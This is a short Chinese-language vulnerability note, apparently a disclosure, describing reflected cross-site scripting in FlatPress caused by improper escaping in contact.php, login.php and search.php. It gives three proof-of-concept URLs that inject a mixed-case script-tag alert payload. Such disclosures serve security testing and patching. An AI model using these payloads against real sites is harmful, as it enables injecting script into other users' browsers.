#### 1. 漏洞成因
在contact.php、login.php、search.php页面中对输入的转义处理不恰当
#### 2.漏洞验证
```
http://server/flatpress/contact.php/>"><ScRiPt>alert(test)</ScRiPt>
```
```
http://server/flatpress/login.php/>"><ScRiPt>alert(test)</ScRiPt>
```
```
http://server/flatpress/search.php/>"><ScRiPt>alert(test)</ScRiPt>
```
暂无评论